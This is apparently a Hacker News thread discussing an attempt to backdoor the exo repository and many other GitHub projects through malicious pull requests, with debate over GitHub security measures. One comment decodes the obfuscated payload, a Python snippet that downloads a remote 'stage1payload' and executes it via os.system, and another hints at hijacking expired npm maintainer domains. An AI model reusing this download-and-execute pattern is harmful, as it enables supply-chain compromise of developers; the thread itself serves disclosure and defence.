Backdoor attempt on Exolabs GitHub repo through an innocent looking PR
twitter.com
twitter.com
If any GitHub teammates are reading here, open source repo maintainers (including me) really need better/stronger tools for potentially risky PRs and contributors.
In order of importance IMHO:
1. Throttle PRs for new participants. For example, why is a new account able to send the same kinds of PRs to so many repos, and all at the same time?
2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
3. Create across-repo across-organization flagging for risky PRs. For example, when a repo owner sees a PR that's questionable, currently the repo owner can report it to GitHub staff but that takes quite a while; instead, what if a repo owner can flag a PR as questionable, which in turn can propagate cautionary flags on similar PRs or similar author activity?
Maybe accounts should even require ID verification. We can't afford to fuck around anymore, a significant share of the world's software supply chain lives on GitHub. It's time to take things seriously.
It's probably already happening.
That's the second time for PyTorch, to the best of my knowledge. I know someone who found that (or something very much like it) back in 2022 and reported it, as I had to help him escalate through a relevant security contact I had at Meta.
It simply should not be allowed to do this. Nor maintain Actions without mandatory 2FA. All it takes is one account to be compromised to infect thousands of pipelines. Thousands of pipelines can be used to infect thousands of repos. Thousands of repos can be used to infect thousands of accounts... ad infinitum.
When you go from v1.5.3 to v1.5.4 you make v1.5 and v1 point to v1.5.4
Using a commit hash is the second most secure option. The first (in my eyes) is vendoring the actions you want to use in your user/org's namespace. Maintaining when/if to sync or backport upstream modifications can protect against these kinds of attacks.
However, this does depend on the repo being vetted ahead of time, before being vendored.
Tags are not automatically updated from remotes on pull (they are automatically created locally if it's a new tag). This doesn't mean that the remote can't change what the tag points to, only that it's easy to spot.
Edit: and to be clear, for many years after release, this was the recommendation from the Visual Source Safe team (Yes, that team developed GitHub Actions) for managing your actions. Tell people to use "v1", then delete the tag update it each time.
https://github.com/rust-build/rust-build.action/blob/59be2ed...
What do you even review when it's one of those? There's thousands of lines changed and they all point to commits on other repositories.
You're essentially hoping it's fine.
>Your account meets this criteria, and you will need to enroll in 2FA within 45 days, by November 8th, 2024 at 00:00 (UTC). After this date, your access to GitHub.com will be limited until you enroll in 2FA. Enrolling is easy, and we support several options, starting with TOTP apps and text messages (SMS) and then adding on passkeys and the GitHub Mobile app.
I think the exact deadline depends on the organisation. I know that I only enabled 2FA for my throwaway work account (we don't use github at work, and I didn't want to comment using my personal one) last week.
I was talking about non-work accounts that don't belong to organizations. Mine got forced to use 2fa a long time ago.
I agree that pinning commits is reasonable and that GitHub's UI and Actions system are awful. However, you said:
> Maybe accounts should even require ID verification
This would worsen the following problems:
1. GitHub actions are seen as "trustworthy"
2. GitHub actions lack granular permissions with default no
3. Rising incentives to attempt developer machine compromise, including via $5 wrench[1]
4. Risk of identity information being stolen via breach
> It's time to take things seriously.
Why not add strong capability models to CI? We have SEGFAULT for programs, right? Let's expand on the idea. Stop an action run when:
* an action attempts unexpected network access
* an action attempts IO on unexpected files or folders
The US DoD and related organizations seem to like enforcing this at the compiler level. For example, Ada's got:
* a heavily contract-based approach[2] for function preconditions
* pragma capabilities to forbid using certain features in a module
Other languages have inherited similar ideas in weaker forms, and I mean more than just Rust's borrow checker. Even C# requires explicit declaration to accept null values as arguments [3].
Some languages are taking a stronger approach. For example, Gren's[4] developers are considering the following for IO:
1. you need to have permission to access the disk and other devices
2. permissions default to no
> We can't afford to fuck around anymore,
Sadly, the "industry" seems to disagree with us here. Do you remember when:
1. Microsoft tried to ship 99% of a credit card number and SSN exfiltration tool[5] as a core OS component?
2. BSoD-as-service stopped global air travel?
It seems like a great time to be selling better CI solutions. ¯\_(ツ)_/¯
[2]: https://learn.adacore.com/courses/intro-to-ada/chapters/cont...
[3]: https://learn.microsoft.com/en-us/dotnet/csharp/language-ref...
[5]: https://arstechnica.com/ai/2024/06/windows-recall-demands-an...
Just do a blue checkmark thing by tying the account to real-world identity (eIDAS etc). It's not rocket science, there are gazillion providers that offer these sort of id checks as service, GH would just need to integrate it.
By the way on gh you can also buy stars for your project from fake accounts.
>>> ''.join(chr(x) for x in [105,109,112,111,114,116,32,111,115,10,105,109,112,111,114,116,32,117,114,108,108,105,98,10,105,109,112,111\ ,114,116,32,117,114,108,108,105,98,46,114,101,113,117,101 ,115,116,10,120,32,61,32,117,114,108,108,105,98,46,114,101,113,117,101,115,11\ 6,46,117,114,108,111,112,101,110,40,34,104,116,116,112,115,58,47,47,119,119,119,46,101, 118,105,108,100,111,106,111,46,99,111,109,47,11\ 5,116,97,103,101,49,112,97,121,108,111,97,100,34,41,10,121,32,61,32,120,46,114,101,97,100,40,41,10,122,32,61,32,121,4,6,100,101,99,111,\ 00,101,40,34,117,116,102,56,34,41,10,120,46,99,108,111,115,101,40,41,10,111,115,46,115,121,115,116,101,109,40,122,411,10])
'import os\nimport urllib\nimport urllib.request\nx = urllib.request.urlopen("https://www.evildojo.com/stage1payload")\ny = x.read()\nz = y\x04\x06decode("utf8")\nx.close()\nos.system(z)\n'
There are very few people who can do that.
It's news cycle should have conveyed a sense of "oh shit, we really do need to be watching for discretely malicious contributors" not "whoa, I can't believe there was someone capable of that!" -- it seems like you learned the wrong lesson.
Judging how many drive by's a random ipv4 address gets on aws, gcp, azure, or vultr- they get ignored if they get it wrong, and nobody notices until too late if they get it right.
It's akin to putting an exploit into say some security software. It's probably going to have access to something you care about.
The combination of all three tends to mostly appear in nation states. They have the motive, and they have the money to fund people with the ability to pull off this kind of attack.
Plenty of expired npm maintainer email domains right now. Have fun.
I have done it twice to bring exposure to the issue. Seemingly no one cares enough to do the most basic things like code signing.
you’re right. What made the XZ attacker rather unique is the fact they made useful contributions at first and only turned nasty later on.
Not many people can keep a malicious campaign going on as long as the XZ attacker did which is why it’s suspected to be a nation-backed attack
They were even better, the library behaved completely normal when used anywhere else.
xz was found because it behaved differently.
Not sure how hte OP describes that as innocent looking.
obfuscated code, check
use of eval, check
How was that innocent looking?
Threat actor attempted to slipstream a malware payload into yt-dlp's GitHub repo - https://news.ycombinator.com/item?id=42121969 - Nov 2024 (5 comments)
Zero nation-states are involved in this.
well guess what? it bypasses even your "Require approval for all outside collaborators" flag in your repo setting and trigger it on your self-hosted runner anyway...
This was brought up in recent BlackHat24:
https://github.com/AdnaneKhan/ConferenceTalks/blob/main/Blac...
And yes - it's another "Github won't fix"
Full list of attempted pull requests (all deleted seemingly by GitHub):
1 https://www.github.com/KurtBestor/Hitomi-Downloader/pull/7638
2 https://www.github.com/home-assistant/core/pull/130423
3 https://www.github.com/celery/celery/pull/9407
4 https://www.github.com/chriskiehl/Gooey/pull/921
5 https://www.github.com/crewAIInc/crewAI/pull/1582
6 https://www.github.com/cumulo-autumn/StreamDiffusion/pull/177
7 https://www.github.com/AUTOMATIC1111/stable-diffusion-webui/pull/16646
8 https://www.github.com/Aider-AI/aider/pull/2343
9 https://www.github.com/aboul3la/Sublist3r/pull/383
10 https://www.github.com/plotly/dash/pull/3073
11 https://www.github.com/soimort/you-get/pull/3034
12 https://www.github.com/streamlink/streamlink/pull/6290
13 https://www.github.com/jumpserver/jumpserver/pull/14440
14 https://www.github.com/junyanz/pytorch-CycleGAN-and-pix2pix/pull/1684
15 https://www.github.com/kornia/kornia/pull/3069
16 https://www.github.com/langflow-ai/langflow/pull/4520
17 https://www.github.com/exo-explore/exo/pull/432
18 https://www.github.com/PostHog/posthog/pull/26144
19 https://www.github.com/PrefectHQ/prefect/pull/15987
20 https://www.github.com/pydantic/pydantic/pull/10822
21 https://www.github.com/pyg-team/pytorch_geometric/pull/9777
22 https://www.github.com/qutebrowser/qutebrowser/pull/8379
23 https://www.github.com/tornadoweb/tornado/pull/3441
24 https://www.github.com/ungoogled-software/ungoogled-chromium/pull/3092
25 https://www.github.com/locustio/locust/pull/2980
26 https://www.github.com/matterport/Mask_RCNN/pull/3057
27 https://www.github.com/Stability-AI/generative-models/pull/425
28 https://www.github.com/yt-dlp/yt-dlp/pull/11520
[1] https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPT...It raised a lot of questions about conducting ethical security research on open source projects, whether security research of this nature counts as an "experiment on people" (which has a lot more scrutiny, obviously), etc.
"[...] Lu and Wu explained that they’d been able to introduce vulnerabilities into the Linux kernel by submitting patches that appeared to fix real bugs but also introduced serious problems."
https://cse.umn.edu/cs/linux-incident
https://www.theverge.com/2021/4/30/22410164/linux-kernel-uni...
On github I did get weird and suspicious contributions.
I've heard from Hackernews who read the book and didn't see the IDE screenshots. Maybe the paperback didn't have them.
Security is expensive. Pay for it now or pay more later.